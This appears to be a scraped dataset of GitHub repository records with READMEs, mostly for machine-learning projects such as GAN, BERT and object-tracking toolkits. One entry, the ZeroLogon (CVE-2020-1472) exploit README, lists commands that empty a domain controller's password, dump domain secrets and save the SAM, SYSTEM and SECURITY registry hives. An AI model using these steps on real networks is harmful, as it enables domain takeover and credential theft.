[Joseph Lim's group at USC](http://csail.mit.edu/~lim), our motivation is to accelerate (or sometimes delay) research in the AI community by promoting open-source projects. To this end, we implement state-of-the-art research papers, and publicly share them with concise reports. Please visit our [group github site](https://github.com/gitlimlab) for other projects.\n\nThis project is implemented by [Shao-Hua Sun](http://shaohua0116.github.io) and the codes have been reviewed by [Jiayuan Mao](https://github.com/vacancy) before being published.\n\n## Descriptions\nThis project is a [Tensorflow](https://www.tensorflow.org/) implementation of **Semi-supervised Learning Generative Adversarial Networks** proposed in the paper [Improved Techniques for Training GANs](http://arxiv.org/abs/1606.03498). The intuition is exploiting the samples generated by GAN generators to boost the performance of image classification tasks by improving generalization.\n\nIn sum, **the main idea** is training a network playing both the roles of a *classifier* performing image classification task as well as a *discriminator* trained to distinguish generated samples produced by a *generator* from the real data. To be more specific, the discriminator/classifier takes an image as input and classified it into *n+1* classes, where *n* is the number of classes of a classification task. True samples are classified into the first *n* classes and generated samples are classified into the *n+1*-th class, as shown in the figure below.\n\n\n\nThe loss of this multi-task learning framework can be decomposed into the **supervised loss** \n\n, \n\nand the **GAN loss** of a discriminator\n\n, \n\nDuring the training phase, we jointly minimize the total loss obtained by simply combining the two losses together.\n\nThe implemented model is trained and tested on three publicly available datasets: [MNIST](http://yann.lecun.com/exdb/mnist/), [SVHN](http://ufldl.stanford.edu/housenumbers/), and [CIFAR-10](https://www.cs.toronto.edu/~kriz/cifar.html).\n\nNote that this implementation only follows the main idea of the original paper while differing a lot in implementation details such as model architectures, hyperparameters, applied optimizer, etc. Also, some useful training tricks applied to this implementation are stated at the end of this README.\n\n\\*This code is still being developed and subject to change.\n\n## Prerequisites\n\n- Python 2.7 or Python 3.3+\n- [Tensorflow 1.0.0](https://github.com/tensorflow/tensorflow/tree/r1.0)\n- [SciPy](http://www.scipy.org/install.html)\n- [NumPy](http://www.numpy.org/)\n\n## Usage\n\nDownload datasets with:\n```bash\n$ python download.py --dataset MNIST SVHN CIFAR10\n```\nTrain models with downloaded datasets:\n```bash\n$ python trainer.py --dataset MNIST\n$ python trainer.py --dataset SVHN\n$ python trainer.py --dataset CIFAR10\n```\nTest models with saved checkpoints:\n```bash\n$ python evaler.py --dataset MNIST --checkpoint ckpt_dir\n$ python evaler.py --dataset SVHN --checkpoint ckpt_dir\n$ python evaler.py --dataset CIFAR10 --checkpoint ckpt_dir\n```\nThe *ckpt_dir* should be like: ```train_dir/default-MNIST_lr_0.0001_update_G5_D1-20170101-194957/model-1001```\n\nTrain and test your own datasets:\n\n* Create a directory\n```bash\n$ mkdir datasets/YOUR_DATASET\n```\n\n* Store your data as an h5py file datasets/YOUR_DATASET/data.hy and each data point contains\n * 'image': has shape [h, w, c], where c is the number of channels (grayscale images: 1, color images: 3)\n * 'label': represented as an one-hot vector\n* Maintain a list datasets/YOUR_DATASET/id.txt listing ids of all data points\n* Modify trainer.py including args, data_info, etc.\n* Finally, train and test models:\n```bash\n$ python trainer.py --dataset YOUR_DATASET\n$ python evaler.py --dataset YOUR_DATASET\n```\n## Results\n\n### MNIST\n\n* Generated samples (100th epochs)\n\n\n\n* First 40 epochs\n\n\n\n### SVHN\n\n* Generated samples (100th epochs)\n\n\n\n* First 160 epochs\n\n\n\n\n### CIFAR-10\n\n* Generated samples (1000th epochs)\n\n\n\n* First 200 epochs\n\n\n\n## Training details\n\n### MNIST\n\n* The supervised loss\n\n\n\n* The loss of Discriminator\n\nD_loss_real\n\n\n\nD_loss_fake\n\n\n\nD_loss (total loss)\n\n\n\n* The loss of Generator\n\nG_loss\n\n\n\n* Classification accuracy\n\n\n\n### SVHN\n\n* The supervised loss\n\n\n\n* The loss of Discriminator\n\nD_loss_real\n\n\n\nD_loss_fake\n\n\n\nD_loss (total loss)\n\n\n\n* The loss of Generator\n\nG_loss\n\n\n\n* Classification accuracy\n\n\n\n### CIFAR-10\n\n* The supervised loss\n\n\n\n* The loss of Discriminator\n\nD_loss_real\n\n\n\nD_loss_fake\n\n\n\nD_loss (total loss)\n\n\n\n* The loss of Generator\n\nG_loss\n\n\n\n* Classification accuracy\n\n\n\n## Training tricks\n\n* To avoid the fast convergence of the discriminator network\n * The generator network is updated more frequently.\n * Higher learning rate is applied to the training of the generator.\n* One-sided label smoothing is applied to the positive labels.\n* Gradient clipping trick is applied to stablize training\n* Reconstruction loss with an annealed weight is applied as an auxiliary loss to help the generator get rid of the initial local minimum.\n* Utilize [Adam](https://arxiv.org/abs/1412.6980) optimizer with higher momentum.\n* Please refer to the codes for more details.\n\n## Related works\n* [Unsupervised and Semi-supervised Learning with Categorical Generative Adversarial Networks](https://arxiv.org/abs/1511.06390) by Springenberg\n* [Semi-Supervised Learning with Generative Adversarial Networks](https://arxiv.org/abs/1606.01583) by Odena\n* [Good Semi-supervised Learning that Requires a Bad GAN](https://arxiv.org/abs/1705.09783) by Dai *et. al.*\n* My implementation of [Deep Convolutional Generative Adversarial Networks](https://github.com/shaohua0116/DCGAN-Tensorflow) in Tensorflow\n* The architecture diagram is modified from the one drawn in [Unsupervised Representation Learning with Deep Convolutional Generative Adversarial Networks](https://arxiv.org/abs/1511.06434)\n\n## Acknowledgement\n\nPart of codes is from an unpublished project with [Jongwook Choi](https://github.com/wookayin)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "QuantStack/ipysheet", "link": "https://github.com/QuantStack/ipysheet", "tags": ["jupyter", "widgets", "spreadsheet"], "stars": 515, "description": "Jupyter handsontable integration", "lang": "Python", "repo_lang": "", "readme": "# ipysheet\n\n# WARNING\n\nDue to [Handsontable licensing changes](https://handsontable.com/blog/articles/2019/3/handsontable-drops-open-source-for-a-non-commercial-license) ipysheet is stuck witch the outdated Handsontable version 6.2.2 (open-source).\nWe recommend not using ipysheet anymore. We suggest an alternative like [ipydatagrid](https://github.com/bloomberg/ipydatagrid).\n\nSpreadsheet in the Jupyter notebook:\n\n * Try it out using binder: [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/QuantStack/ipysheet/stable?filepath=docs%2Fsource%2Findex.ipynb)\n * Or check out the documentation at [https://ipysheet.readthedocs.io/](https://ipysheet.readthedocs.io/en/stable/)\n\n**Create a table and drive a value using ipywidgets:**\n\n![Slider Screencast](docs/source/ipysheet_slider.gif)\n\n**Perform a calculation on slider change:**\n\n![Slider Calculation Screencast](docs/source/ipysheet_slider_calculation.gif)\n\n**Change cell style depending on the value using renderers:**\n\n![Conditional formatting](docs/source/conditional_formatting.png)\n\n**Populate table using cell ranges:**\n\n![Cell Ranges Screencast](docs/source/ipysheet_cell_range.gif)\n\n# Installation\n\nWith conda:\n\n```\n$ conda install -c conda-forge ipysheet\n```\n\nWith pip:\n\n```\n$ pip install ipysheet\n```\n\n### Development install\n\nNote: You will need NodeJS to build the extension package.\n\nThe `jlpm` command is JupyterLab's pinned version of\n[yarn](https://yarnpkg.com/) that is installed with JupyterLab. You may use\n`yarn` or `npm` in lieu of `jlpm` below.\n\n```bash\n# Clone the repo to your local environment\n# Change directory to the ipysheet directory\n# Install package in development mode\npip install -e .\n# Link your development version of the extension with JupyterLab\njupyter labextension develop . --overwrite\n# Rebuild extension Typescript source after making changes\njlpm run build\n```\n\nYou can watch the source directory and run JupyterLab at the same time in different terminals to watch for changes in the extension's source and automatically rebuild the extension.\n\n```bash\n# Watch the source directory in one terminal, automatically rebuilding when needed\njlpm run watch\n# Run JupyterLab in another terminal\njupyter lab\n```\n\nWith the watch command running, every saved change will immediately be built locally and available in your running JupyterLab. Refresh JupyterLab to load the change in your browser (you may need to wait several seconds for the extension to be rebuilt).\n\nBy default, the `jlpm run build` command generates the source maps for this extension to make it easier to debug using the browser dev tools. To also generate source maps for the JupyterLab core extensions, you can run the following command:\n\n```bash\njupyter lab build --minimize=False\n```\n\n### Development uninstall\n\n```bash\npip uninstall ipysheet\n```\n\nIn development mode, you will also need to remove the symlink created by `jupyter labextension develop`\ncommand. To find its location, you can run `jupyter labextension list` to figure out where the `labextensions`\nfolder is located. Then you can remove the symlink named `ipysheet` within that folder.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "uber-research/go-explore", "link": "https://github.com/uber-research/go-explore", "tags": [], "stars": 515, "description": "Code for Go-Explore: a New Approach for Hard-Exploration Problems", "lang": "Python", "repo_lang": "", "readme": "# Go-Explore\n\nThis is the code for [First return then explore](https://arxiv.org/abs/2004.12919), the new Go-explore paper. Code for the [original paper](https://arxiv.org/abs/1901.10995) can be found in this repository under the tag \"v1.0\" or the release \"Go-Explore v1\". \n\nThe code for Go-Explore with a deterministic exploration phase followed by a robustification phase is located in the `robustified` subdirectory. The code for Go-Explore with a policy-based exploration phase is located in the `policy_based` subdirectory. Installation instructions for each variant of Go-Explore can be found in their respective directories.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chenjiandongx/bili-spider", "link": "https://github.com/chenjiandongx/bili-spider", "tags": ["bilibili", "spider"], "stars": 515, "description": "\ud83d\udcfa B \u7ad9\u5168\u7ad9\u89c6\u9891\u4fe1\u606f\u722c\u866b", "lang": "Python", "repo_lang": "", "readme": "# B \u7ad9\u5168\u7ad9\u89c6\u9891\u4fe1\u606f\u722c\u866b\n\nB \u7ad9\u6211\u60f3\u5927\u5bb6\u90fd\u719f\u6089\u5427\uff0c\u5176\u5b9e B \u7ad9\u7684\u722c\u866b\u7f51\u4e0a\u4e00\u641c\u4e00\u5927\u5806\u3002\u4e0d\u8fc7 **\u7eb8\u4e0a\u5f97\u6765\u7ec8\u89c9\u6d45\uff0c\u7edd\u77e5\u6b64\u4e8b\u8981\u8eac\u884c**\uff0c\u6211\u7801\u6545\u6211\u5728\u3002\u6700\u7ec8\u722c\u53d6\u5230\u6570\u636e\u603b\u91cf\u4e3a **1300 \u4e07** \u6761\u3002\n\n#### \u5f00\u53d1\u73af\u5883\u4e3a\uff1aWindows10 + python3\n\n### \u51c6\u5907\u5de5\u4f5c\n\n\u9996\u5148\u6253\u5f00 B \u7ad9\uff0c\u968f\u4fbf\u5728\u9996\u9875\u627e\u4e00\u4e2a\u89c6\u9891\u70b9\u51fb\u8fdb\u53bb\u3002\u5e38\u89c4\u64cd\u4f5c\uff0c\u6253\u5f00\u5f00\u53d1\u8005\u5de5\u5177\u3002\u8fd9\u6b21\u662f\u76ee\u6807\u662f\u901a\u8fc7\u722c\u53d6 B \u7ad9\u63d0\u4f9b\u7684 api \u6765\u83b7\u53d6\u89c6\u9891\u4fe1\u606f\uff0c\u4e0d\u53bb\u89e3\u6790\u7f51\u9875\uff0c\u89e3\u6790\u7f51\u9875\u7684\u901f\u5ea6\u592a\u6162\u4e86\u800c\u4e14\u5bb9\u6613\u88ab\u5c01 ip\u3002\n\n\u52fe\u9009 JS \u9009\u9879\uff0cF5 \u5237\u65b0\n\n![bili-0](https://github.com/chenjiandongx/bili-spider/blob/master/images/bili-0.png)\n\n\u627e\u5230\u4e86 api \u7684\u5730\u5740\n\n![bili-1](https://github.com/chenjiandongx/bili-spider/blob/master/images/bili-1.png)\n\n\u590d\u5236\u4e0b\u6765\uff0c\u53bb\u9664\u6ca1\u5fc5\u8981\u7684\u5185\u5bb9\uff0c\u5f97\u5230 https://api.bilibili.com/x/web-interface/archive/stat?aid=15906633 \uff0c\u7528\u6d4f\u89c8\u5668\u6253\u5f00\uff0c\u4f1a\u5f97\u5230\u5982\u4e0b\u7684 json \u6570\u636e\n\n![bili-2](https://github.com/chenjiandongx/bili-spider/blob/master/images/bili-2.png)\n\n### \u52a8\u624b\u5199\u7801\n\n\u597d\u4e86\uff0c\u5230\u8fd9\u91cc\u4ee3\u7801\u5c31\u53ef\u4ee5\u7801\u8d77\u6765\u4e86\uff0c\u901a\u8fc7 request \u4e0d\u65ad\u7684\u8fed\u4ee3\u83b7\u53d6\u6570\u636e\uff0c\u4e3a\u4e86\u8ba9\u722c\u866b\u66f4\u9ad8\u6548\uff0c\u53ef\u4ee5\u5229\u7528\u591a\u7ebf\u7a0b\u3002\n\n#### \u6838\u5fc3\u4ee3\u7801\n```\nresult = []\nreq = requests.get(url, headers=headers, timeout=6).json()\ntime.sleep(0.6) # \u5ef6\u8fdf\uff0c\u907f\u514d\u592a\u5feb ip \u88ab\u5c01\ntry:\n data = req['data']\n video = (\n total,\n data['aid'], # \u89c6\u9891\u7f16\u53f7\n data['view'], # \u64ad\u653e\u91cf\n data['danmaku'], # \u5f39\u5e55\u6570\n data['reply'], # \u8bc4\u8bba\u6570\n data['favorite'], # \u6536\u85cf\u6570\n data['coin'], # \u786c\u5e01\u6570\n data['share'] # \u5206\u4eab\u6570\n )\n with lock:\n result.append(video)\n if total % 100 == 0:\n print(total)\n total += 1\nexcept:\n pass\n```\n\n#### \u8fed\u4ee3\u722c\u53d6\n```\nurls = [\"http://api.bilibili.com/archive_stat/stat?aid={}\".format(i)\n for i in range(10000)]\nwith futures.ThreadPoolExecutor(32) as executor: # \u591a\u7ebf\u7a0b\n executor.map(run, urls)\n```\n\n\u722c\u53d6\u540e\u6570\u636e\u5b58\u653e\u8fdb\u4e86 MySQL \u6570\u636e\u5e93\uff0c\u603b\u5171\u722c\u53d6\u5230\u4e86 1300w+ \u6761\u6570\u636e\n\n\u524d 750w \u6761\u6570\u636e\u5728\u8fd9\u91cc [bili.zip](https://github.com/chenjiandongx/bili-spider/blob/master/data/bili.zip)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "risksense/zerologon", "link": "https://github.com/risksense/zerologon", "tags": [], "stars": 515, "description": "Exploit for zerologon cve-2020-1472", "lang": "Python", "repo_lang": "", "readme": "# ZeroLogon exploitation script\n\nExploit code based on https://www.secura.com/blog/zero-logon and https://github.com/SecuraBV/CVE-2020-1472. Original research and scanner by Secura, modifications by RiskSense Inc.\n\nTo exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/b867b21 or newer. Then, do:\n\n```\npython3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR\n```\n\nIf that's successful you will then be able to:\n```\nsecretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'\n```\nwhich should get you Domain Admin. After you have that, wmiexec.py to the target DC with a credential from the secretsdump and do\n```\nreg save HKLM\\SYSTEM system.save\nreg save HKLM\\SAM sam.save\nreg save HKLM\\SECURITY security.save\nget system.save\nget sam.save\nget security.save\ndel /f system.save\ndel /f sam.save\ndel /f security.save\n```\n\nThen you can\n```\nsecretsdump.py -sam sam.save -system system.save -security security.save LOCAL\n```\nAnd that should show you the original NT hash of the machine account. You can then re-install that original machine account hash to the domain by\n```\npython3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH\n```\n\nReinstalling the original hash is necessary for the DC to continue to operate normally.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Socialbird-AILab/BERT-Classification-Tutorial", "link": "https://github.com/Socialbird-AILab/BERT-Classification-Tutorial", "tags": [], "stars": 515, "description": null, "lang": "Python", "repo_lang": "", "readme": "#BERT-Classification-Tutorial\nLabeling data can be said to be the most difficult task in AI model training. Data annotation for natural language processing requires a lot of manpower. Compared with image annotation in computer vision, there is usually no accurate standard answer for text annotation, and the understanding of sentences varies from person to person, making this task even more difficult.\nbut! Google's recently released BERT has greatly solved this problem! According to our experiments, BERT can bring a significant improvement in classification accuracy with extremely small data in the multi-text classification task. Moreover, the main comparison of the experiment is the State of the art language model transfer learning model - ULMFiT (https://arxiv.org/abs/1801.06146) released only 5 months ago, and the results have been significantly improved.\n\n![alt text](https://github.com/Socialbird-AILab/BERT-Classification-Tutorial/blob/master/pictures/Results.png)\n\nFrom the above figure, we can see that in different data sets, BERT has very good performance. The experimental data we use is divided into 1000, 6700 and 12000 pieces, and each contains test data, and the training test split is 80%-20%. The dataset is obtained from multiple web sources and undergoes a series of taxonomic mappings. However, the Noisy dataset has significant noise, and sampling statistics show that the noise ratio is around 20%. The experiment compared several models, from the most basic convolutional network as Baseline, to convolutional network plus traditional word vector Glove embedding, and then ULMFiT and BERT.\n\n\n# 1. Operating environment\nThe Tensorflow version is Windows 1.10.0 GPU, and the specific installation tutorial can refer to this link https://www.tensorflow.org/install/pip?lang=python3. Anaconda version is 1.9.2.\n\n# 2. Hardware configuration\nThe graphics card used in the experiment is NVIDIA GeoForce GTX 1080 Ti, and the BERT base model occupies about 9.5G of video memory.\n\n# 3. Download the model\nAfter all the operating environments are set up, we can download the BERT base for our experiment here: https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip\n After downloading, put it in BERT_BASE_DIR.\n\n# 4. Input data preparation\nWe need to split the text data into three parts:\n\" Train: train.tsv\n\" Evaluate: dev.tsv\n\" Test: test.tsv\nBelow you can see the format of each file, which is very simple. One column is the text data that needs to be classified, and the other column is the corresponding Label.\n\nThe data folder contains 1000 sample data of 10 categories, which are divided into training and testing sets.\n\n![alt text](https://github.com/Socialbird-AILab/BERT-Classification-Tutorial/blob/master/pictures/Our%20data%20example.png)\n\n# 5. Implementation details\nRun run_classifier.py to implement the text classification task of 1000 10-category sample data. For specific implementation details, please refer to the tutorial: https://mp.weixin.qq.com/s/XmeDjHSFI0UsQmKeOgwnyA", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "framespot/client-py", "link": "https://github.com/framespot/client-py", "tags": ["upload-filter", "copyright-protection", "copyright-violation-detection", "copyright-infringement", "copyright-scan", "content-recognition"], "stars": 514, "description": "Free Copyright Filter to fulfill EU Upload Filter Directive", "lang": "Python", "repo_lang": "", "readme": "Free copyright filter to fulfill EU Copyright Directive\n\n### Install dependencies\n\nThe python client depends on `opencv-contrib-python` or `opencv-contrib-python-headless`\n\n```\ngit clone https://github.com/framespot/client-py.git\ncd client-py\npip install -r requirements.txt\n```\n\n### Inference copyright\n\n```\npython . --verbose /path/to/movie.mp4\npython . --verbose /path/to/stockphoto.jpg\n```\n\n### Example result\n\n```JSON\n[{\n \"uri\": \"https://www.imdb.com/title/tt2380307/\",\n \"ids\": {\"imdb\": \"tt2380307\", \"tmdb\": \"movie/354912\"},\n \"title\": \"Coco\",\n \"year\": \"2017\",\n \"genres\": [\"Animation\",\"Family\",\"Comedy\",\"Adventure\",\"Fantasy\"],\n \"companies\": [\"Pixar\",\"Walt Disney Pictures\"],\n \"homepage\": \"https://www.pixar.com/feature-films/coco\",\n \"poster\": \"https://www.themoviedb.org/t/p/original/gGEsBPAijhVUFoiNpgZXqRVWJt2.jpg\",\n \"frames\": [{\n \"type\": \"movie\",\n \"season\": null,\n \"episode\": null,\n \"offset\": 1855,\n \"hamming\": 8,\n \"matrix\": [[ 1.001, 0.008,-0.001],\n [-0.008, 1.001, 0.004]]\n }]\n}]\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "got-10k/toolkit", "link": "https://github.com/got-10k/toolkit", "tags": [], "stars": 514, "description": "Official Python toolkit for generic object tracking benchmark GOT-10k and beyond", "lang": "Python", "repo_lang": "", "readme": "# GOT-10k Python Toolkit\n\n> UPDATE:
\n> All common tracking datasets (GOT-10k, OTB, VOT, UAV, TColor, DTB, NfS, LaSOT and TrackingNet) are supported.
\n> Support VOT2019 (ST/LT/RGBD/RGBT) downloading.
\n> Fix the randomness in ImageNet-VID ([issue #13](https://github.com/got-10k/toolkit/issues/13)).\n\n_Run experimenets over common tracking benchmarks (code from [siamfc](https://github.com/got-10k/siamfc/blob/master/test.py)):_\n\n\"sample_batch_run\"\n\nThis repository contains the official python toolkit for running experiments and evaluate performance on [GOT-10k](http://got-10k.aitestunion.com/) benchmark. The code is written in pure python and is compile-free. Although we support both python2 and python3, we recommend python3 for better performance.\n\nFor convenience, the toolkit also provides unofficial implementation of dataset interfaces and tracking pipelines for [OTB (2013/2015)](http://cvlab.hanyang.ac.kr/tracker_benchmark/index.html), [VOT (2013~2018)](http://votchallenge.net), [DTB70](https://github.com/flyers/drone-tracking), [TColor128](http://www.dabi.temple.edu/~hbling/data/TColor-128/TColor-128.html), [NfS (30/240 fps)](http://ci2cv.net/nfs/index.html), [UAV (123/20L)](https://ivul.kaust.edu.sa/Pages/pub-benchmark-simulator-uav.aspx), [LaSOT](https://cis.temple.edu/lasot/) and [TrackingNet](https://tracking-net.org/) benchmarks. It also offers interfaces for [ILSVRC VID](https://image-net.org/challenges/LSVRC/2015/#vid) and [YouTube-BoundingBox](https://research.google.com/youtube-bb/) (comming soon!) datasets.\n\n[GOT-10k](http://got-10k.aitestunion.com/) is a large, high-diversity and one-shot database for training and evaluating generic purposed visual trackers. If you use the GOT-10k database or toolkits for a research publication, please consider citing:\n\n```Bibtex\n@ARTICLE{8922619,\n author={Huang, Lianghua and Zhao, Xin and Huang, Kaiqi},\n journal={IEEE Transactions on Pattern Analysis and Machine Intelligence}, \n title={GOT-10k: A Large High-Diversity Benchmark for Generic Object Tracking in the Wild}, \n year={2021},\n volume={43},\n number={5},\n pages={1562-1577},\n doi={10.1109/TPAMI.2019.2957464}}\n```\n\n \\[[Project](http://got-10k.aitestunion.com/)\\]\\[[PDF](https://arxiv.org/abs/1810.11981)\\]\\[[Bibtex](http://got-10k.aitestunion.com/bibtex)\\]\n\n## Table of Contents\n\n* [Installation](#installation)\n* [Quick Start: A Concise Example](#quick-start-a-concise-example)\n* [Quick Start: Jupyter Notebook for Off-the-Shelf Usage](#quick-start-jupyter-notebook-for-off-the-shelf-usage)\n* [How to Define a Tracker?](#how-to-define-a-tracker)\n* [How to Run Experiments on GOT-10k?](#how-to-run-experiments-on-got-10k)\n* [How to Evaluate Performance?](#how-to-evaluate-performance)\n* [How to Plot Success Curves?](#how-to-plot-success-curves)\n* [How to Loop Over GOT-10k Dataset?](#how-to-loop-over-got-10k-dataset)\n* [Issues](#issues)\n* [Contributors](#contributors)\n\n### Installation\n\nInstall the toolkit using `pip` (recommended):\n\n```bash\npip install --upgrade got10k\n```\n\nStay up-to-date:\n\n```bash\npip install --upgrade git+https://github.com/got-10k/toolkit.git@master\n```\n\nOr, alternatively, clone the repository and install dependencies:\n\n```\ngit clone https://github.com/got-10k/toolkit.git\ncd toolkit\npip install -r requirements.txt\n```\n\nThen directly copy the `got10k` folder to your workspace to use it.\n\n### Quick Start: A Concise Example\n\nHere is a simple example on how to use the toolkit to define a tracker, run experiments on GOT-10k and evaluate performance.\n\n```Python\nfrom got10k.trackers import Tracker\nfrom got10k.experiments import ExperimentGOT10k\n\nclass IdentityTracker(Tracker):\n def __init__(self):\n super(IdentityTracker, self).__init__(name='IdentityTracker')\n \n def init(self, image, box):\n self.box = box\n\n def update(self, image):\n return self.box\n\nif __name__ == '__main__':\n # setup tracker\n tracker = IdentityTracker()\n\n # run experiments on GOT-10k (validation subset)\n experiment = ExperimentGOT10k('data/GOT-10k', subset='val')\n experiment.run(tracker, visualize=True)\n\n # report performance\n experiment.report([tracker.name])\n```\n\nTo run experiments on [OTB](http://cvlab.hanyang.ac.kr/tracker_benchmark/index.html), [VOT](http://votchallenge.net) or other benchmarks, simply change `ExperimentGOT10k`, e.g., to `ExperimentOTB` or `ExperimentVOT`, and `root_dir` to their corresponding paths for this purpose.\n\n### Quick Start: Jupyter Notebook for Off-the-Shelf Usage\n\nOpen [quick_examples.ipynb](https://github.com/got-10k/toolkit/tree/master/examples/quick_examples.ipynb) in [Jupyter Notebook](http://jupyter.org/) to see more examples on toolkit usage.\n\n### How to Define a Tracker?\n\nTo define a tracker using the toolkit, simply inherit and override `init` and `update` methods from the `Tracker` class. Here is a simple example:\n\n```Python\nfrom got10k.trackers import Tracker\n\nclass IdentityTracker(Tracker):\n def __init__(self):\n super(IdentityTracker, self).__init__(\n name='IdentityTracker', # tracker name\n is_deterministic=True # stochastic (False) or deterministic (True)\n )\n \n def init(self, image, box):\n self.box = box\n\n def update(self, image):\n return self.box\n```\n\n### How to Run Experiments on GOT-10k?\n\nInstantiate an `ExperimentGOT10k` object, and leave all experiment pipelines to its `run` method:\n\n```Python\nfrom got10k.experiments import ExperimentGOT10k\n\n# ... tracker definition ...\n\n# instantiate a tracker\ntracker = IdentityTracker()\n\n# setup experiment (validation subset)\nexperiment = ExperimentGOT10k(\n root_dir='data/GOT-10k', # GOT-10k's root directory\n subset='val', # 'train' | 'val' | 'test'\n result_dir='results', # where to store tracking results\n report_dir='reports' # where to store evaluation reports\n)\nexperiment.run(tracker, visualize=True)\n```\n\nThe tracking results will be stored in `result_dir`.\n\n### How to Evaluate Performance?\n\nUse the `report` method of `ExperimentGOT10k` for this purpose:\n\n```Python\n# ... run experiments on GOT-10k ...\n\n# report tracking performance\nexperiment.report([tracker.name])\n```\n\nWhen evaluated on the __validation subset__, the scores and curves will be directly generated in `report_dir`.\n\nHowever, when evaluated on the __test subset__, since all groundtruths are withholded, you will have to submit your results to the [evaluation server](http://got-10k.aitestunion.com/submit_instructions) for evaluation. The `report` function will generate a `.zip` file which can be directly uploaded for submission. For more instructions, see [submission instruction](http://got-10k.aitestunion.com/submit_instructions).\n\nSee public evaluation results on [GOT-10k's leaderboard](http://got-10k.aitestunion.com/leaderboard).\n\n## How to Plot Success Curves?\n\nAssume that a list of all performance files (JSON files) are stored in `report_files`, here is an example showing how to plot success curves:\n\n```Python\nfrom got10k.experiments import ExperimentGOT10k\n\nreport_files = ['reports/GOT-10k/performance_25_entries.json']\ntracker_names = ['SiamFCv2', 'GOTURN', 'CCOT', 'MDNet']\n\n# setup experiment and plot curves\nexperiment = ExperimentGOT10k('data/GOT-10k', subset='test')\nexperiment.plot_curves(report_files, tracker_names)\n```\n\nThe report file of 25 baseline entries can be downloaded from the [Downloads page](http://got-10k.aitestunion.com/downloads). You can also download single report file for each entry from the [Leaderboard page](http://got-10k.aitestunion.com/leaderboard).\n\n### How to Loop Over GOT-10k Dataset?\n\nThe `got10k.datasets.GOT10k` provides an iterable and indexable interface for GOT-10k's sequences. Here is an example:\n\n```Python\nfrom PIL import Image\nfrom got10k.datasets import GOT10k\nfrom got10k.utils.viz import show_frame\n\ndataset = GOT10k(root_dir='data/GOT-10k', subset='train')\n\n# indexing\nimg_file, anno = dataset[10]\n\n# for-loop\nfor s, (img_files, anno) in enumerate(dataset):\n seq_name = dataset.seq_names[s]\n print('Sequence:', seq_name)\n\n # show all frames\n for f, img_file in enumerate(img_files):\n image = Image.open(img_file)\n show_frame(image, anno[f, :])\n```\n\nTo loop over `OTB` or `VOT` datasets, simply change `GOT10k` to `OTB` or `VOT` for this purpose.\n\n### Issues\n\nPlease report any problems or suggessions in the [Issues](https://github.com/got-10k/toolkit/issues) page.\n\n### Contributors\n\n- [Lianghua Huang](https://github.com/huanglianghua)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dvlab-research/DeepUPE", "link": "https://github.com/dvlab-research/DeepUPE", "tags": [], "stars": 514, "description": "Underexposed Photo Enhancement Using Deep Illumination Estimation", "lang": "Python", "repo_lang": "", "readme": "# Underexposed Photo Enhancement Using Deep Illumination Estimation\n\n[Ruixing Wang](http://appsrv.cse.cuhk.edu.hk/~rxwang/)1, [Qing Zhang](http://zhangqing-home.net)2, [Chi-Wing Fu](https://www.cse.cuhk.edu.hk/~cwfu/)1, [Xiaoyong Shen](http://xiaoyongshen.me/)3, [Wei-Shi Zheng](https://sites.google.com/site/sunnyweishi/)2, [Jiaya Jia](http://jiaya.me/)1,3\n\n1The chinese university of hong kong 2Sun Yat-sen University 3Tencent Youtu Lab\n\n### [Paper](https://drive.google.com/file/d/1CCd0NVEy0yM2ulcrx44B1bRPDmyrgNYH/view?usp=sharing), [Errata](https://drive.google.com/file/d/1fJ7MQfm6NuCMtfQzLM0Y6LNU9XyQb6Ho/view?usp=sharing)\n### Usage\n\n1. Clone the repository:\n\n ```shell\n git clone https://github.com/wangruixing/DeepUPE.git\n ```\n2. Install the Python dependencies, run:\n ```shell\n cd main\n pip install -r requirements.txt\n make\n ```\n3. Evaluation:\nThe test set can be downloaded in https://drive.google.com/open?id=1FrlMdnwiUfHthtw0jHdp40IbOVXfsoZJ. It includes 500 pair images from MIT-Adobe FiveK 4500-5000. You can download this and run:\n```shell\n python main/run.py checkpoints \n``` \nPSNR evaluation code is in avg_psnr.m. Modify the related paths in 'avg_psnr.m', and run it.\n\n### Errata\nWe recently found an implementation bug in calculating PSNR. Fortunately, this bug doesn't affect any of the conclusions in our paper, we have corrected this bug in the Matlab code and updated the corresponding values in the revised paper. We apologize for the confusion to readers.\n\n\n# Bibtex\n```\n@InProceedings{Wang_2019_CVPR,\nauthor = {Wang, Ruixing and Zhang, Qing and Fu, Chi-Wing and Shen, Xiaoyong and Zheng, Wei-Shi and Jia, Jiaya},\ntitle = {Underexposed Photo Enhancement Using Deep Illumination Estimation},\nbooktitle = {The IEEE Conference on Computer Vision and Pattern Recognition (CVPR)},\nmonth = {June},\nyear = {2019}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dclambert/Python-ELM", "link": "https://github.com/dclambert/Python-ELM", "tags": [], "stars": 514, "description": "Extreme Learning Machine implementation in Python", "lang": "Python", "repo_lang": "", "readme": "Python-ELM v0.3\n===============\n\n__---> ARCHIVED March 2021 <---__\n\n###### This is an implementation of the [Extreme Learning 